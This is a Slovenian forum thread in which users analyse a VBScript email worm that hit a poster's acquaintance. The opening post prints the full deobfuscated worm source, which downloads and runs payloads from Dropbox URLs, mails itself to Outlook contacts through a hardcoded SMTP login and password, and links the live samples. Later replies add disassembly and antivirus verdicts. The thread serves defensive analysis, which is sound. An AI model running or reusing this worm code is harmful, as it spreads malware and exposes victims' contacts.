» »

Reverse engineering virusa

Reverse engineering virusa

lsvet1 ::

Danes se je moji znanki dogodila neprijetna stvar, namreč očitno je nekje odprla neko VB Scripto in okužila računalnik z virusom. Bi bilo pa fajn ugotoviti kaj počne in kako jo odstraniti. Stvarca se širi preko maila in facebooku, tako da sm lahko tudi jaz prišel do svojega izvoda. Problem je, da je stvar očitno nova in jo AV-ji še ne zaznajo, je pa kar precej kompleksno zgrajena. Torej, širi se preko obfuscatane VB scripte (random ime npr. oosdfk75.zip; notri je oosdfk75.vbs), koda, kakor mi jo je uspelo deobfuscatat je spodnja

On Error Resume Next Randomize Dim tmpDir: tmpDir = "C:\temp" Dim tmpFileName: tmpFileName = getName(int(rnd * 10) + 5) & "." & getName(2) Dim pepeSource Dim selfLink pepeSource = "http://dl.dropboxusercontent.com/s/rxkbtjtpvzgrra4/xml.zip?dl=1,http://dl.dropboxusercontent.com/s/8w0ldbbf0ndb78l/xml.zip?dl=1,http://dl.dropboxusercontent.com/s/ubdlqx6leqy3gw8/xml.zip?dl=1,http://dl.dropboxusercontent.com/s/h6znwxvjs3rpvw7/xml.zip?dl=1,http://dl.dropboxusercontent.com/s/eclb44x6t01lxsg/xml.zip?dl=1,http://dl.dropboxusercontent.com/s/ywfb7lux4of25au/xml.zip?dl=1,http://dl.dropboxusercontent.com/s/6xm9cw2dkmo0q0k/xml.zip?dl=1,http://dl.dropboxusercontent.com/s/xoqbc490nurxeow/xml.zip?dl=1,http://dl.dropboxusercontent.com/s/ja2hb47rwkzqqo8/xml.zip?dl=1,http://dl.dropboxusercontent.com/s/y8lpltcjxuf81n7/xml.zip?dl=1,http://dl.dropboxusercontent.com/s/8zaselhbwkdw3w7/xml.zip?dl=1,http://dl.dropboxusercontent.com/s/xfyakmoo7gzv4j3/xml.zip?dl=1,http://dl.dropboxusercontent.com/s/bxlxjku6u6i5mqq/xml.zip?dl=1,http://dl.dropboxusercontent.com/s/gs3eq8r00yn4of8/xml.zip?dl=1,http://dl.dropboxusercontent.com/s/6e7xw9qrovheepd/xml.zip?dl=1,http://dl.dropboxusercontent.com/s/073he87wsizsn14/xml.zip?dl=1,http://dl.dropboxusercontent.com/s/z4jl4ckge68ly86/xml.zip?dl=1,http://dl.dropboxusercontent.com/s/2v5auf9b4wh1sas/xml.zip?dl=1,http://dl.dropboxusercontent.com/s/clw9swn6w7ez8yz/xml.zip?dl=1,http://dl.dropboxusercontent.com/s/yc4ju3wap4y71va/xml.zip?dl=1,http://dl.dropboxusercontent.com/s/l93ij60w4jsgj6e/xml.zip?dl=1,http://dl.dropboxusercontent.com/s/ll2ydaxt1qesxbg/xml.zip?dl=1,http://dl.dropboxusercontent.com/s/h5fy4kinzcqpo0e/xml.zip?dl=1,http://dl.dropboxusercontent.com/s/1dxzjip2h8ep2fl/xml.zip?dl=1,http://dl.dropboxusercontent.com/s/98yoxgz9nh00lxp/xml.zip?dl=1,http://dl.dropboxusercontent.com/s/r7ll4mze3xigpkb/xml.zip?dl=1,http://dl.dropboxusercontent.com/s/da9mznunn0kz588/xml.zip?dl=1,http://dl.dropboxusercontent.com/s/36gldtb1ngjhjg1/xml.zip?dl=1,http://dl.dropboxusercontent.com/s/h3bt7tygbf91jsm/xml.zip?dl=1,http://dl.dropboxusercontent.com/s/m26w3f17a8zc3tr/xml.zip?dl=1,http://dl.dropboxusercontent.com/s/vntfj2zc6nygvv2/xml.zip?dl=1" yesSource = "http://dl.dropboxusercontent.com/s/o0d1ce9toe9a9rq/clickyes.dat?dl=1,http://dl.dropboxusercontent.com/s/f2h777xsqv8cepb/clickyes.dat?dl=1,http://dl.dropboxusercontent.com/s/ui6zo977ttx7bqy/clickyes.dat?dl=1,http://dl.dropboxusercontent.com/s/tsv6l172jqlt0tf/clickyes.dat?dl=1,http://dl.dropboxusercontent.com/s/d9bt6hyvhjjwwkd/clickyes.dat?dl=1" vbsSource = "http://dl.dropboxusercontent.com/s/uw92ooko73yincw/Documents.zip?dl=1,http://dl.dropboxusercontent.com/s/j7eiyij7wshwhoe/Documents.zip?dl=1,http://dl.dropboxusercontent.com/s/x2npx95tzmk724r/Documents.zip?dl=1,http://dl.dropboxusercontent.com/s/i0orsrnizec9fr0/Documents.zip?dl=1,http://dl.dropboxusercontent.com/s/liwvrveoh67qbnw/Documents.zip?dl=1" createTmpDir() getPepe pepeSource, tmpDir & "\" & tmpFileName pwnpwn("regsvr32 /s " & tmpDir & "\" & tmpFileName) getPepe yesSource, tmpDir & "\clickyes.exe" pwnpwn(tmpDir & "\clickyes.exe") WScript.Sleep(3000) selfLink = getSelfLink(vbsSource) if selfLink = "" then Else spreadTheWord "kate.lisbon" & Int(rnd * 1990) + 1970 & "@yahoo.de", selfLink, "Documents.zip", "ALL" End If Sub pwnpwn(what) Set oShell = WScript.CreateObject("WSCript.shell") oShell.run what End Sub Sub createTmpDir() Set oFSO = CreateObject("Scripting.FileSystemObject") If Not oFSO.FolderExists(tmpDir) Then Set objFolder = oFSO.CreateFolder(tmpDir) End If End Sub Function getSelfLink(source) source = Split(source, ",") for each link in source Dim xHttp: Set xHttp = createobject("microsoft.xmlhttp") Dim bStrm: Set bStrm = createobject("adodb.stream") xHttp.Open "GET", link, False xHttp.Send If(xHttp.Status = 200) then getSelfLink = link Exit Function End If Next End Function Sub getPepe(source, destination) source = Split(source, ",") for each link in source Dim xHttp: Set xHttp = createobject("microsoft.xmlhttp") Dim bStrm: Set bStrm = createobject("adodb.stream") xHttp.Open "GET", link, False xHttp.Send If(xHttp.Status = 200) then With bStrm .type = 1 .open .write xHttp.responseBody .savetofile destination, 2 End With For a = 0 to int(rnd * 10) + 3 WScript.Sleep(1000) Next Exit Sub End If Next End Sub Function getName(numOfChars) Dim currentString Dim charset charset = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz" For i = 0 to numOfChars currentString = currentString & Mid(charset, int(Len(charset)*rnd+1), 1) Next getName = currentString End Function Sub SendMessage(MailFrom, MailTo, Subject, Message) Dim ObjSendMail Set ObjSendMail = CreateObject("CDO.Message") With ObjSendMail.Configuration.Fields .Item("http://schemas.microsoft.com/cdo/configuration/sendusing") = 2 .Item("http://schemas.microsoft.com/cdo/configuration/smtpserver") = "mailgate.otenet.gr" .Item("http://schemas.microsoft.com/cdo/configuration/smtpserverport") = 587 .Item("http://schemas.microsoft.com/cdo/configuration/smtpusessl") = False .Item("http://schemas.microsoft.com/cdo/configuration/smtpconnectiontimeout") = 60 .Item("http://schemas.microsoft.com/cdo/configuration/smtpauthenticate") = 1 .Item("http://schemas.microsoft.com/cdo/configuration/sendusername") = "nastia26@otenet.gr" .Item("http://schemas.microsoft.com/cdo/configuration/sendpassword") = "nat1978#" .Update End With ObjSendMail.To = MailTo ObjSendMail.Subject = Subject ObjSendMail.From = MailFrom ObjSendMail.HTMLBody = Message ObjSendMail.Send Set ObjSendMail = Nothing End Sub Function ElementInArray(aMyArray, strLookingFor, compare) ElementInArray = (UBound(Filter(aMyArray, strLookingFor, True, compare)) > - 1) End Function Sub spreadTheWord(SenderEmail, URL, DOCNAME, mailFilter) Const olFolderContacts = 10 isThere = Array() Set objOutlook = CreateObject("Outlook.Application") Set objNamespace = objOutlook.GetNamespace("MAPI") Set colContacts = objNamespace.GetDefaultFolder(olFolderContacts).Items For Each objContact In colContacts If objContact.Email1Address = "" Then Else If mailFilter <> "ALL" And InStr(objContact.Email1Address, mailFilter) Then If ElementInArray(isThere, objContact.Email1Address, compare) Then Else SendMessage SenderEmail, objContact.Email1Address, "RE: Documents", "Here re the required documents you asked for.
" & DOCNAME & "
Keep me posted for any complaints or anything.
Thank you." ReDim Preserve isThere(UBound(isThere) + 1) isThere(UBound(isThere)) = objContact.Email1Address End If ElseIf mailFilter = "ALL" Then If ElementInArray(isThere, objContact.Email1Address, compare) Then Else SendMessage SenderEmail, objContact.Email1Address, "RE: Documents", "Here re the required documents you asked for.
" & DOCNAME & "
Keep me posted for any complaints or anything.
Thank you." ReDim Preserve isThere(UBound(isThere) + 1) isThere(UBound(isThere)) = objContact.Email1Address End If End If End If If objContact.Email2Address = "" Then Else If mailFilter <> "ALL" And InStr(objContact.Email2Address, mailFilter) Then If ElementInArray(isThere, objContact.Email2Address, compare) Then Else SendMessage SenderEmail, objContact.Email1Address, "RE: Documents", "Here re the required documents you asked for.
" & DOCNAME & "
Keep me posted for any complaints or anything.
Thank you." ReDim Preserve isThere(UBound(isThere) + 1) isThere(UBound(isThere)) = objContact.Email2Address End If ElseIf mailFilter = "ALL" Then If ElementInArray(isThere, objContact.Email2Address, compare) Then Else SendMessage SenderEmail, objContact.Email1Address, "RE: Documents", "Here re the required documents you asked for.
" & DOCNAME & "
Keep me posted for any complaints or anything.
Thank you." ReDim Preserve isThere(UBound(isThere) + 1) isThere(UBound(isThere)) = objContact.Email2Address End If End If End If If objContact.Email3Address = "" Then Else If mailFilter <> "ALL" And InStr(objContact.Email3Address, mailFilter) Then If ElementInArray(isThere, objContact.Email3Address, compare) Then Else SendMessage SenderEmail, objContact.Email1Address, "RE: Documents", "Here re the required documents you asked for.
" & DOCNAME & "
Keep me posted for any complaints or anything.
Thank you." ReDim Preserve isThere(UBound(isThere) + 1) isThere(UBound(isThere)) = objContact.Email3Address End If ElseIf mailFilter = "ALL" Then If ElementInArray(isThere, objContact.Email3Address, compare) Then Else SendMessage SenderEmail, objContact.Email1Address, "RE: Documents", "Here re the required documents you asked for.
" & DOCNAME & "
Keep me posted for any complaints or anything.
Thank you." ReDim Preserve isThere(UBound(isThere) + 1) isThere(UBound(isThere)) = objContact.Email3Address End If End If End If Next Const olFolderInbox = 6 Set objFolder = objNamespace.GetDefaultFolder(olFolderInbox) Set colItems = objFolder.Items For Each objItem in colItems If mailFilter <> "ALL" And InStr(objItem.SenderEmailAddress, mailFilter) Then If ElementInArray(isThere, objItem.SenderEmailAddress, compare) Then Else SendMessage SenderEmail, objContact.Email1Address, "RE: Documents", "Here re the required documents you asked for.
" & DOCNAME & "
Keep me posted for any complaints or anything.
Thank you." ReDim Preserve isThere(UBound(isThere) + 1) isThere(UBound(isThere)) = objItem.SenderEmailAddress End If ElseIf mailFilter = "ALL" Then If ElementInArray(isThere, objItem.SenderEmailAddress, compare) Then Else SendMessage SenderEmail, objContact.Email1Address, "RE: Documents", "Here re the required documents you asked for.
" & DOCNAME & "
Keep me posted for any complaints or anything.
Thank you." ReDim Preserve isThere(UBound(isThere) + 1) isThere(UBound(isThere)) = objItem.SenderEmailAddress End If End If Next End Sub 


Kakor je videti stvar torej downloada tri stvari iz dropboxa documents.zip, xml.zip in pa clickyes.dat; documents.zip je obfuscated source code virusa, ki se pošilja in širi drugim preko facebooka in emaila (predvidevam, da preko outlook address liste); xml.zip in pa clickyes.dat sta pa kakor mi je uspelo do sedaj ugotoviti executable fajla (.exe) samo z drugo končnico, ni mi pa še uspelo ugotoviti kaj naredita, torej če se komu ljubi in ima čas na hitro reverse engineerat, bi pomoč prišla zelo prav. Prilagam zazipane fajle, saj bodo morda kmalu izbrisani z Dropboxa - PREVIDNO pri odpiranju http://www61.zippyshare.com/v/31759391/...

UPDATE:
Clickyes.exe je zelo verjetno tole http://www.contextmagic.com/express-cli... in omogoči main programu v xml.zip pošiljanje pošte brez prompta...
"Express ClickYes is a tiny program that runs in the system tray and automatically clicks the Yes button for the Outlook security prompt, that asks you to confirm mail sending from third party applications or access to Outlook's address book."

UPDATE2: očitno gre za nek tip(xml.zip) bitcoin minerja...

Hvala za pomoč
  • spremenil: lsvet1 ()

sas084 ::

Na hitro sm pregledu clickyes.dat in zgleda da gre za Express ClickYes 1.2 (exe ni zapakiran/obfuskiran, nisem pa preverjal hashev z originalom tako da ne morem rečt ali je spremenjen ali ne).

CODE:00404CD3                 push    0
CODE:00404CD5                 push    offset unk_407738
CODE:00404CDA                 push    0
CODE:00404CDC                 push    30h
CODE:00404CDE                 call    SystemParametersInfoA
CODE:00404CE3                 push    0C80000h
CODE:00404CE8                 mov     eax, ds:dword_407740
CODE:00404CED                 sub     eax, 0EDh
CODE:00404CF2                 push    eax
CODE:00404CF3                 mov     eax, ds:dword_407744
CODE:00404CF8                 sub     eax, 78h
CODE:00404CFB                 push    eax
CODE:00404CFC                 push    0EBh
CODE:00404D01                 push    76h
CODE:00404D03                 push    0
CODE:00404D05                 push    0
CODE:00404D07                 mov     eax, ds:hModule
CODE:00404D0C                 push    eax
CODE:00404D0D                 push    0
CODE:00404D0F                 mov     ecx, offset aExpressClick_0 ; "Express ClickYes 1.2"
CODE:00404D14                 mov     edx, offset aExclickyes_wnd ; "EXCLICKYES_WND"
CODE:00404D19                 mov     eax, 100h
CODE:00404D1E                 call    sub_403D48
CODE:00404D23                 mov     ds:hWnd, eax
CODE:00404D28                 push    5Ah
CODE:00404D2A                 push    3Eh
CODE:00404D2C                 push    3Ch
CODE:00404D2E                 push    14h
CODE:00404D30                 mov     eax, ds:hWnd
CODE:00404D35                 push    eax
CODE:00404D36                 push    0
CODE:00404D38                 mov     eax, ds:hModule
CODE:00404D3D                 push    eax
CODE:00404D3E                 push    0
CODE:00404D40                 mov     edx, offset aOk ; "OK"
CODE:00404D45                 mov     eax, offset aButton_0 ; "Button"
CODE:00404D4A                 mov     ecx, 50001000h
CODE:00404D4F                 call    sub_403DA0


xml.zip pa Symantec zazna kot Suspicious.AD. Bolj podrobno bom pregledu ko bom imel čas.

wanderer ::

NOD32: a variant of Win32/Injector.BEIE trojan

misek ::

wanderer je izjavil:

NOD32: a variant of Win32/Injector.BEIE trojan
Pa pravijo da je NOD32 zanič AV :|

Mesar ::

Kdo to pravi?

Sicer pa uploadaj sem pa boš dobil report... https://www.virustotal.com/
Your turn to burn!

Zgodovina sprememb…

  • spremenil: Mesar ()


Vredno ogleda ...

TemaSporočilaOglediZadnje sporočilo
TemaSporočilaOglediZadnje sporočilo
»

Seznam slovenskih besed

Oddelek: Programiranje
147360 (4850) bubadiop
»

Foto - Aprilska norost

Oddelek: Zvok in slika
294287 (1913) Super Sonic
»

UserControl v Wrappanelu WPF

Oddelek: Programiranje
51145 (967) hurlimannxt
»

Visual Basic

Oddelek: Programiranje
313443 (2469) cekr
»

dropbox vprašanje ?

Oddelek: Omrežja in internet
497078 (5348) fulgur

Več podobnih tem